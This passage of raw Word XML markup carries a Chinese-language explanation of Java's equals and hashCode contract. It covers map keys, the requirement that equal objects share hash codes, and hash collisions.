          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，并且</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>b.equals(c)=true</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的话，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>a.equals(c)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>也必须为</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>通过改写</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>对象的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>equals</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>hashcode</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>方法，我们可以将任意的业务对象作为</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>map</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>key(</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>前提是你确实有这样的需要</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A1305" w:rsidRPr="00744ED7" w:rsidRDefault="000A1305" w:rsidP="000A1305">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="279" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>四、关于</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC30EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>相等的对象必须具有相等的哈希码</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A1305" w:rsidRPr="00744ED7" w:rsidRDefault="000A1305" w:rsidP="000A1305">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="279" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">　　由于作为</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>的对象将通过计算其散列函数</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>hashCode()</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>来确定与之对应的</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>value</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>的位置，因此任何作为</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>的对象都必须实现</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>hashCode</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>equals</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>方法。</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>hashCode</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>equals</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>方法继承自根类</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>Object</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>，如果你用自定义的类当作</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>的话，要相当小心，按照散列函数的定义，</w:t>
      </w:r>
      <w:r w:rsidRPr="00874020">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>如果两个对象相同，即</w:t>
      </w:r>
      <w:r w:rsidRPr="00874020">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>obj1.equals(obj2)=true</w:t>
      </w:r>
      <w:r w:rsidRPr="00874020">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>，则它们的</w:t>
      </w:r>
      <w:r w:rsidRPr="00874020">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>hashCode</w:t>
      </w:r>
      <w:r w:rsidRPr="00874020">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>必须相同，但如果两个对象不同，则它们的</w:t>
      </w:r>
      <w:r w:rsidRPr="00874020">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>hashCode</w:t>
      </w:r>
      <w:r w:rsidRPr="00874020">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>不一定不同，如果两个不同对象的</w:t>
      </w:r>
      <w:r w:rsidRPr="00874020">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>hashCode</w:t>
      </w:r>
      <w:r w:rsidRPr="00874020">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>相同，这种现象称为冲突，冲突会导致操作哈希表的时间开销增大，所以尽量定义好的</w:t>
      </w:r>
      <w:r w:rsidRPr="00874020">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>hashCode()</w:t>
      </w:r>
      <w:r w:rsidRPr="00874020">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>方法，能加快哈希表的操作</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">　　如果相同的对象有不同的</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>hashCode</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>，对哈希表的操作会出现意想不到的结果（期待的</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>get</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>方法返回</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>），要避免这种问题，只需要牢记一条：要同时复写</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>equals</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>方法和</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>hashCode</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>方法，而不要只写其中一个。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A1305" w:rsidRPr="00744ED7" w:rsidRDefault="000A1305" w:rsidP="000A1305">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="279" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>同时复写</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>equals</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>方法和</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>hashCode</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>方法</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
